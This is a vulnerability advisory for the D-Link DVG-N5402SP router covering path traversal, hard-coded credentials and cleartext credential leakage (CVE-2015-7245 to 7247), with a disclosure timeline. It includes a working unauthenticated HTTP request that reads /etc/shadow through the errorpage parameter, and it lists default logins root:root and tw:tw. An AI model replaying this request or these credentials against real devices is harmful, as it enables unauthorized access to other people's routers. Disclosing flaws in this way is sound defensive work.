D-Link DVG-N5402SP Path Traversal / Information Disclosure
Posted on 04 February 2016
DLink DVGN5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVGN5402SP Web Management Model Name : GPN2.4P21CCN Firmware Version : W1000CN00 Firmware Version :W1000CN03 Firmware Version :W2000EN00 Hardware Platform :ZS Hardware Version :Gpn2.4P21C_WIFIV0.05 Device can be managed through three users: 1. super full privileges 2. admin full privileges 3. support restricted user *1. Path traversal* Arbitrary files can be read off of the device file system. No authentication is required to exploit this vulnerability. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgibin/webproc HTTP/1.1 Host: <IP>:8080 UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: http://<IP>:8080/cgibin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal>name:getpage; pstVal>value:html/main.html pstVal>name:getpage; pstVal>value:html/index.html pstVal>name:errorpage; pstVal>value:../../../../../../../../../../../etc/shadow pstVal>name:var:menu; pstVal>value:setup pstVal>name:var:page; pstVal>value:connected pstVal>name:var:subpage; pstVal>value: pstVal>name:objaction; pstVal>value:auth pstVal>name::username; pstVal>value:super pstVal>name::password; pstVal>value:super pstVal>name::action; pstVal>value:login pstVal>name::sessionid; pstVal>value:1ac5da6b Connection: close Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=1ac5da6b; expires=Fri, 31Dec9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, HardCoded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login tw is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. *3.Sensitive info leakage via device running configuration backup * *CVE-ID*: CVE-2015-7247 Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in cleartext and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in